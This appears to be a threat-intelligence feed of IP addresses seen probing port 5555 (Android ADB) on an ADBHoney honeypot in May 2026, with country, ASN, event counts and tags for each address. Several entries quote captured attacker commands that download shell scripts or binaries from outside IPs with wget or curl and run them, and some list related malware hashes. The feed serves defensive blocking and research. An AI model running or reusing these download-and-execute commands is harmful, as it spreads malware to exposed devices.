IPv4	171.35.130.176	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-14T02:36:20.000Z \| last_seen=2026-05-14T02:37:29.527Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	212.227.153.157	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=ES; asn=8560; asn_org=IONOS SE; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-14T03:02:48.000Z \| last_seen=2026-05-14T03:15:15.837Z \| ports=5555 \| cc=ES \| asn=8560 \| org=IONOS SE	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	114.98.177.175	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-14T04:07:58.000Z \| last_seen=2026-05-19T10:38:33.587Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	45.156.129.120	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-14T04:18:04.000Z \| last_seen=2026-05-14T04:28:07.146Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	45.156.129.122	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-14T04:16:29.000Z \| last_seen=2026-05-14T04:28:19.146Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	143.198.40.225	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-14T08:47:40.000Z \| last_seen=2026-05-14T08:58:32.665Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	114.98.177.185	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=30 \| first_seen=2026-05-14T12:00:46.000Z \| last_seen=2026-05-28T10:59:09.275Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	64.227.161.161	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-14T12:34:35.000Z \| last_seen=2026-05-14T12:35:41.742Z \| ports=5555 \| cc=IN \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	64.62.156.152	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-14T14:58:18.000Z \| last_seen=2026-05-22T11:18:17.476Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	64.62.156.155	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-14T14:57:34.000Z \| last_seen=2026-05-14T14:58:35.684Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	80.94.95.221	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=62 \| first_seen=2026-05-14T14:37:11.000Z \| last_seen=2026-05-20T06:55:03.165Z \| ports=5555 \| cc=RO \| asn=204428 \| org=SS-Net	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	23.92.27.206	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-14T15:59:00.000Z \| last_seen=2026-05-14T16:00:08.209Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	45.202.247.210	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=MO; asn=61112; asn_org=AKILE LTD; adb_cmd_hits=0; cmd="wget -qO /tmp/.armv7l http://45.202.247.123/armv7l && chmod 755 /tmp/.armv7l && nohup /tmp/.armv7l >/dev/null 2>&1 &; wget -qO /tmp/.armv5l http://45.202.247.12" Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-14T15:07:08.000Z \| last_seen=2026-05-14T15:08:16.971Z \| ports=5555 \| cc=MO \| asn=61112 \| org=AKILE LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	47.112.31.244	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-14T15:17:11.000Z \| last_seen=2026-05-14T15:18:15.121Z \| ports=5555 \| cc=CN \| asn=37963 \| org=Hangzhou Alibaba Advertising Co.,Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	176.65.139.188	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://166.88.225.196/i/android.sh; sh android.sh; curl http://166.88.225.196/i/android.sh -o android.sh; sh android.sh; wget " Observed in ADBHoney telemetry for 2026-05. events=1050 \| first_seen=2026-05-14T16:57:31.000Z \| last_seen=2026-05-26T22:25:23.697Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	165.154.163.206	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-14T19:24:23.000Z \| last_seen=2026-05-14T19:25:31.005Z \| ports=5555 \| cc=US \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	185.141.119.87	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=94 \| first_seen=2026-05-13T09:26:01.000Z \| last_seen=2026-05-18T16:33:36.709Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	13.89.124.223	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-14T22:14:31.000Z \| last_seen=2026-05-14T22:27:07.523Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	216.25.89.107	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-14T23:45:25.000Z \| last_seen=2026-05-14T23:46:30.052Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	45.82.76.108	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=212512; asn_org=Detai Prosperous Technologies Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-15T00:02:31.000Z \| last_seen=2026-05-15T00:04:07.054Z \| ports=5555 \| cc=DE \| asn=212512 \| org=Detai Prosperous Technologies Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	193.169.194.68	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=GB; asn=214576; asn_org=Berdiev Ruslan Mukhabatovich; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-15T01:58:33.000Z \| last_seen=2026-05-15T01:59:40.463Z \| ports=5555 \| cc=GB \| asn=214576 \| org=Berdiev Ruslan Mukhabatovich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	165.22.176.211	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-15T02:24:50.000Z \| last_seen=2026-05-15T02:25:57.938Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	35.203.211.102	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=GB; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-15T02:31:01.000Z \| last_seen=2026-05-15T02:41:58.465Z \| ports=5555 \| cc=GB \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	165.227.16.25	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-15T04:33:14.000Z \| last_seen=2026-05-15T04:34:18.966Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	217.67.51.188	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=GB; asn=5413; asn_org=Wavenet Limited; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-15T06:55:24.000Z \| last_seen=2026-05-22T19:28:57.603Z \| ports=5555 \| cc=GB \| asn=5413 \| org=Wavenet Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	31.56.209.165	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=AE; asn=209373; asn_org=Swissnet LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=67 \| first_seen=2026-05-15T09:02:21.000Z \| last_seen=2026-05-15T17:15:54.443Z \| ports=5555 \| cc=AE \| asn=209373 \| org=Swissnet LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	14.1.104.175	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-15T10:36:48.000Z \| last_seen=2026-05-15T10:47:04.628Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	65.49.1.99	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-15T13:59:37.000Z \| last_seen=2026-05-15T14:00:43.756Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	65.49.1.94	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-04T15:00:09.000Z \| last_seen=2026-05-23T00:40:30.404Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	65.49.1.18	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-15T16:35:08.000Z \| last_seen=2026-05-15T16:36:10.643Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	117.84.167.27	Attacker IP • ADB / seen in ADBHoney; events=64; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=64 \| first_seen=2026-05-15T20:34:00.000Z \| last_seen=2026-05-15T20:48:09.182Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857,6ad3c27482709fcd52f9b9f25b37ce4fbcba59422f3bb4fd2d0f7624b113b7c3,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-15
IPv4	210.99.94.222	Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=59 \| first_seen=2026-05-15T21:20:25.000Z \| last_seen=2026-05-15T21:32:49.541Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-15
IPv4	217.145.227.152	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RU; asn=205775; asn_org=Neon Core Network LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-15T22:45:00.000Z \| last_seen=2026-05-15T22:46:02.838Z \| ports=5555 \| cc=RU \| asn=205775 \| org=Neon Core Network LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-15
IPv4	119.36.159.238	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-15T23:58:36.000Z \| last_seen=2026-05-16T00:00:15.929Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	198.235.24.52	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-15T23:33:06.000Z \| last_seen=2026-05-15T23:44:42.283Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	103.124.165.233	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=AL; asn=197706; asn_org=Keminet SHPK; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-16T00:04:55.000Z \| last_seen=2026-05-16T00:14:57.693Z \| ports=5555 \| cc=AL \| asn=197706 \| org=Keminet SHPK	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	37.37.46.137	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=KW; asn=42961; asn_org=Mobile Telecommunications Company K.S.C.P.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-16T00:04:54.000Z \| last_seen=2026-05-16T00:05:56.279Z \| ports=5555 \| cc=KW \| asn=42961 \| org=Mobile Telecommunications Company K.S.C.P.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	119.160.136.78	Attacker IP • ADB / seen in ADBHoney; events=61; ports=5555; cc=BN; asn=10094; asn_org=Unified National Networks; cats=Generic Protocol Command Decode; adb_cmd_hits=30; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=61 \| first_seen=2026-05-16T05:31:00.000Z \| last_seen=2026-05-16T05:43:10.860Z \| ports=5555 \| cc=BN \| asn=10094 \| org=Unified National Networks \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-16
IPv4	176.65.139.121	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-16T05:29:02.000Z \| last_seen=2026-05-22T08:23:09.963Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	64.62.156.10	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-16T06:15:21.000Z \| last_seen=2026-05-16T06:26:04.667Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	45.142.193.118	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-16T09:02:18.000Z \| last_seen=2026-05-16T09:03:19.070Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	138.197.170.75	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-16T10:13:44.000Z \| last_seen=2026-05-16T10:24:02.259Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	176.65.139.177	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://94.156.152.234/bins.sh; sh bins.sh; curl http://94.156.152.234/bins.sh; sh bins.sh; wget http://94.156.152.234/bins.sh;" Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-16T12:28:06.000Z \| last_seen=2026-05-16T12:30:01.579Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	171.35.129.245	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-16T14:39:57.000Z \| last_seen=2026-05-16T14:41:02.436Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	45.142.193.10	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-16T15:57:33.000Z \| last_seen=2026-05-16T15:58:41.450Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	180.149.125.205	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=MN; asn=45204; asn_org=GEMNET LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-16T16:54:39.000Z \| last_seen=2026-05-16T16:56:20.180Z \| ports=5555 \| cc=MN \| asn=45204 \| org=GEMNET LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	180.149.126.9	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=MN; asn=45204; asn_org=GEMNET LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-16T17:11:28.000Z \| last_seen=2026-05-16T17:21:38.993Z \| ports=5555 \| cc=MN \| asn=45204 \| org=GEMNET LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-16
IPv4	153.3.160.87	Attacker IP • ADB / seen in ADBHoney; events=64; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/log" Observed in ADBHoney telemetry for 2026-05. events=64 \| first_seen=2026-05-16T18:29:08.000Z \| last_seen=2026-05-16T18:42:04.270Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971,7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865,d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-16
IPv4	138.68.225.68	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-16T23:35:26.000Z \| last_seen=2026-05-16T23:36:34.864Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	64.227.51.132	Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=290 \| first_seen=2026-05-16T23:59:57.000Z \| last_seen=2026-05-17T00:11:05.116Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	164.90.159.193	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-17T03:55:25.000Z \| last_seen=2026-05-17T03:56:31.015Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	27.9.156.122	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-17T03:54:13.000Z \| last_seen=2026-05-17T03:55:20.325Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	71.6.134.234	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=53 \| first_seen=2026-05-17T05:55:53.000Z \| last_seen=2026-05-23T14:05:38.681Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	147.182.246.38	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-17T08:47:52.000Z \| last_seen=2026-05-17T08:58:42.479Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	64.62.197.167	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-17T09:04:32.000Z \| last_seen=2026-05-17T09:14:36.059Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	64.62.197.178	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-17T09:02:38.000Z \| last_seen=2026-05-17T09:03:44.092Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	172.238.171.10	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-17T15:58:06.000Z \| last_seen=2026-05-17T15:59:08.382Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	45.79.82.114	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-17T15:58:13.000Z \| last_seen=2026-05-17T15:59:18.337Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	64.62.156.222	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-17T15:36:10.000Z \| last_seen=2026-05-17T15:46:16.078Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
